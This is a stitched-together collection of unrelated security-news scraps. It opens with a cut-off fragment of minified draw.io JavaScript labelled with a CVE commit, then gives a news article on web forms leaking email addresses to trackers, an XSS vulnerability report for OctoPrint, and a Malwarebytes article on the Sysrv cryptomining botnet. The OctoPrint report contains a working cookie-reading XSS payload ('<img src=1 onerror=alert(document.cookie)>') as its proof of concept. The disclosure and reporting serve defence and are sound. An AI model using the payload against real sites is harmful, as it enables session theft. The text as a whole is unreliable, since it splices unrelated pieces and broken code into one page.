f};mxCodecRegistry.register(b)})();(function(){EditorUi.VERSION="18.0.7";EditorUi.compactUi="atlas"!=uiTheme;Editor.isDarkMode()&&(mxGraphView.prototype.gridColor=mxGraphView.prototype.defaultDarkGridColor);EditorUi.enableLogging="1"!=urlParams.stealth&&"1"!=urlParams.lockdown&&(/.\*\\.draw\\.io$/.test(window.location.hostname)||/.\*\\.diagrams\\.net$/.test(window.location.hostname))&&"support.draw.io"!=window.location.hostname;EditorUi.drawHost=window.DRAWIO\_BASE\_URL;EditorUi.lightboxHost=window.DRAWIO\_LIGHTBOX\_URL;EditorUi.lastErrorMessage= null;EditorUi.ignoredAnonymizedChars="\\n\\t\`~!@#$%^&\*()\_+{}|:\\"<>?-=\[\];'./,\\n\\t";EditorUi.templateFile=TEMPLATE\_PATH+"/index.xml";EditorUi.cacheUrl=window.REALTIME\_URL;null==EditorUi.cacheUrl&&"undefined"!==typeof DrawioFile&&(DrawioFile.SYNC="none");Editor.cacheTimeout=1E4;EditorUi.enablePlantUml=EditorUi.enableLogging;EditorUi.isElectronApp=null!=window&&null!=window.process&&null!=window.process.versions&&null!=window.process.versions.electron;EditorUi.nativeFileSupport=!mxClient.IS\_OP&&!EditorUi.isElectronApp&& "1"!=urlParams.extAuth&&"showSaveFilePicker"in window&&"showOpenFilePicker"in window;EditorUi.enableDrafts=!mxClient.IS\_CHROMEAPP&&isLocalStorage&&"0"!=urlParams.drafts;EditorUi.scratchpadHelpLink="https://www.diagrams.net/doc/faq/scratchpad";EditorUi.enableHtmlEditOption=!0;EditorUi.defaultMermaidConfig={theme:"neutral",arrowMarkerAbsolute:!1,flowchart:{htmlLabels:!1},sequence:{diagramMarginX:50,diagramMarginY:10,actorMargin:50,width:150,height:65,boxMargin:10,boxTextMargin:5,noteMargin:10,messageMargin:35, mirrorActors:!0,bottomMarginAdj:1,useMaxWidth:!0,rightAngles:!1,showSequenceNumbers:!1},gantt:{titleTopMargin:25,barHeight:20,barGap:4,topPadding:50,leftPadding:75,gridLineStartPadding:35,fontSize:11,fontFamily:'"Open-Sans", "sans-serif"',numberSectionStyles:4,axisFormat:"%Y-%m-%d"}};EditorUi.logError=function(d,g,k,l,p,q,x){q=null!=q?q:0<=d.indexOf("NetworkError")||0<=d.indexOf("SecurityError")||0<=d.indexOf("NS\_ERROR\_FAILURE")||0<=d.indexOf("out of memory")?"CONFIG":"SEVERE";if(EditorUi.enableLogging&&

CVE-2022-1767: 18.0.7 release · jgraph/drawio@c63f3a0

Data harvested without consent and before forms are submitted in many cases, researchers claim

Data harvested without consent and before forms are submitted in many cases, researchers claim

Email addresses typed into online forms are often handed over to web trackers before being submitted and without user consent, a systematic study by computer scientists has discovered.

Email addresses – or identifiers derived from them – are apparently being used by data brokers and advertisers for cross-site and cross-platform identification of computer users.

As part of an investigation into how data from online forms is used for tracking, a team of four computer scientists measured the extent of email and password collection prior to form submission by analyzing the top 100,000 websites.

Catch up on the latest privacy-related security news and analysis

The researchers – Asuman Senol from KU Leuven in the Netherlands, Mathias Humbert (University of Lausanne, Switzerland), and Gunes Acar and Frederik Zuiderveen Borgesius (both from Radboud University, Belgium) – compared results from two vantage points, in the US and EU, as well as between mobile and desktop browsers.

**Tracking domains**

The team found that email addresses were exfiltrated to tracking domains before form submission and without giving consent on 1,844 websites in the EU crawl and 2,950 websites in the US crawl.

In the majority of cases, data was extracted to well-known tracker domains, but the researchers also identified 41 tracker domains omitted from popular blocklists.

Profiling for ad-serving purposes is not the only concern.

The researchers also identified seemingly inadvertent password collection from 52 websites by third-party relay scripts.

A research paper (PDF) based on the study is due to be presented at the upcoming Usenix ’22 security conference.

INSIGHT Research has come a long way, but gaps remain – security researcher Artur Janc on the state of XS-Leaks

Web users typically enter their email addresses into online forms for reasons including signing up to a service or subscribing to a newsletter.

The research shows that any data entered into such forms may end up in the hands of data brokers – sometimes even in cases where individuals have second thoughts about signing up to something and didn’t hit ‘send’.

The researchers used an online crawler to systematically examine what happens when users close their session before submitting data entered on forms.

**GDPR violation concerns**

Although not a lawyer, Gunes Acar, one of the four main researchers on the project, told The Daily Swig that the behavior of some of the websites may be in violation of stricter data privacy regulations such as the European Union’s General Data Protection Regulation (GDPR).

“Surreptitious email exfiltration for tracking purposes may breach some GDPR principles such as transparency, purpose limitation, and legal basis, but we cannot say for certain whether individual websites violate the GDPR (or other laws) without looking at the specifics,” Acar explained.

Almost half of the websites contacted responded to the researchers’ GDPR-related requests (see response sample here).

“Some websites said they didn’t know that their visitors’ emails were collected by third parties, and they fixed the issue,” Acar said. “That was the most positive outcome.

“Other websites informed us how they were using the emails collected through this behavior,” they added.

**Countermeasures**

Privacy-conscious internet users might well recoil from the revelations, as summarized in a blog post featuring screen captures and videos.

Fortunately, some countermeasures are already available.

Acar explained: “Adblockers (e.g. uBlock Origin) and privacy-focused browsers (Brave, DuckDuckGo) block requests to tracker and advertising domains, and hence may prevent this type of data collection. Only blocking the cookies wouldn’t provide any protection.

“Email relay services may be used to avoid giving the same email address to different online and offline businesses. Apple, DuckDuckGo, and Mozilla offer such services, which can be used to generate alias addresses,” Acer concluded.

The researchers have developed a proof-of-concept browser plugin, LeakInspector, which informs users when their email and passwords are scraped from forms, in addition to blocking “leaky” requests to tracker domains.

“Unfortunately, the add-on is not available on Chrome Web Store, because it relies on APIs that Google disallows in Manifest v3,” Acar said. “We are working on publishing the add-on to Firefox’s add-on repository.”

RECOMMENDED Facebook account takeover: Researcher scoops $40k bug bounty for chained exploit

Popular websites leaking user email data to web tracking domains

Cross-site Scripting (XSS) - Generic in GitHub repository octoprint/octoprint prior to 1.8.0.

**Description**

The Stream URL of octoprint application allowing xss payload to execute for which its leads to Cross-site Scripting (XSS

**Proof of Concept**

Login to the application

Now go to settings -> Webcam & Timelapse -> Stream URL and insert the payload "<img src=1 onerror=alert(document.cookie)> in the Stream URL and click on "Test"

You will see that its making a internal GET request

**Image POC**

    https://drive.google.com/drive/folders/1gvRKz8AKOY8XE3O3z4mJdr61heIxGtH7?usp=sharing
    

**Impact**

User accounts can be hijacked, credentials could be stolen, sensitive data could be exfiltrated, and lastly, access to your client computers can be obtained.

CVE-2022-1432: Cross-site Scripting (XSS) - Generic  in octoprint

The Sysrv botnet has been developing over the last years, and has become a multi-platform botnet that specializes in Monero cryptomining.
The post Sysrv botnet is out to mine Monero on your Windows and Linux servers appeared first on Malwarebytes Labs.

In a Twitter thread, the Microsoft Security Intelligence team have revealed new information about the latest versions of the Sysrv botnet.

The variant they focused on uses a range of known exploits for vulnerabilities in web apps and databases to install cryptocurrency miners on both Windows and Linux systems.

**Background**

The Sysrv botnet first received attention at the end of 2020 because at the time it was one of the rare malware binaries written in Golang (aka GO). Since then the botnet has evolved, gained new features, and changed its behavior. One of the advantages of the Golang language for malware authors is that it allows them to create multi-platform malware—the same malware binaries can be used against Windows and Linux machines.

The latest Sysrv variant scans the Internet for web servers that have security holes offering opportunities such as path traversal, remote file disclosure, and arbitrary file download bugs. Really, any vulnerability that can be exploited to infect the machines.

Once it has gained a foothold and the bot malware is running on a compromised system it deploys a Monero cryptocurrency miner.

**The favorite cryptocurrency**

The most popular cryptocurrency for attackers to mine is Monero. Monero is a cryptocurrency designed for privacy, promising “all the benefits of a decentralized cryptocurrency, without any of the typical privacy concessions”.

No cryptocurrency is anonymous, as many people think, but there are other reasons why cryptojackers favor Monero:

*   Many cryptomining algorithms run significantly better on ASICs or GPUs, but Monero mining algorithms run better on CPUs, which matches what the cryptojacker can expect to find in a containerized environment.
*   Like Bitcoin, Monero is one of the better known cryptocurrencies and therefore is expected to hold its value. That’s a big perk given the unrest in cryptocurrency markets at the time of writing.

With cryptocurrencies, users hide behind a pseudonym, like one or more wallet IDs. Their activities can be tracked—forever—so keeping their identity secret depends on how well they can separate their real identity from their wallet IDs.

**Linux malware**

While Linux malware was almost unheard of a few years ago, a couple of factors have “helped” the development of malware that targets Linux based systems. One is the development of languages that enable the creation of multiplatform malware like Golang. Another is the usage of Linux as the go-to operating system for many IoT devices.

IoT malware has matured over the years and has become popular, especially among botnets. With billions of Internet-connected devices like cars, household appliances, surveillance cameras, and network devices online, IoT devices are a very large bullseye for botnet malware.

The number of malware infections targeting Linux devices rose by 35% in 2021, most commonly to recruit IoT devices for distributed denial of service (DDoS) attacks. And around 95% of web servers run on Linux.

**Vulnerabilities**

Like many other botnets, Sysrv weaponizes bugs in WordPress plugins and in the Spring Framework.  It can rifle through WordPress files on compromised machines to take control of web server software. According to Microsoft:

> “A new behavior observed in Sysrv-K is that it scans for WordPress configuration files and their backups to retrieve database credentials, which it uses to gain control of the web server.”

The latest Sysrv variant also scans for Secure Shell (SSH) keys, IP addresses, and host names on infected machines so that it can use this information to spread via SSH connections. SSH keys are an access credential used in the SSH protocol and are foundational to modern Infrastructure-as-a-Service platforms such as AWS, Google Cloud, and Azure.

Another vulnerability the botnet uses is CVE-2022-22947. Some Spring cloud gateway version applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed, and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.

**Development**

The botnet malware starts with a simple script file that deploys modules of exploits against potentially vulnerable targets. Not only do the developers constantly add new exploits to the code, they keep updating the code. If the exploits aren’t successful, the developers get rid of them. Ever since the first appearance of the Sysrv botnet, the threat actors have released new scripts almost monthly.

**Mitigation**

Most of the vulnerabilities that the Sysrv botnet uses have been patched, so an effective patch management strategy can be a big help in keeping these miners off your systems.

Another strategy to looks at is whether all the servers that are at risk need to be Internet-facing. In some cases it may be better to take them offline.

Don’t forget to equip your servers with anti-malware protection. The time that you could rest assured that your Linux server would be safe is unfortunately over.

Safeguard your credentials and make sure that multi-factor authentication (MFA) is in place for your important assets.

Stay safe, everyone!

Tag

#google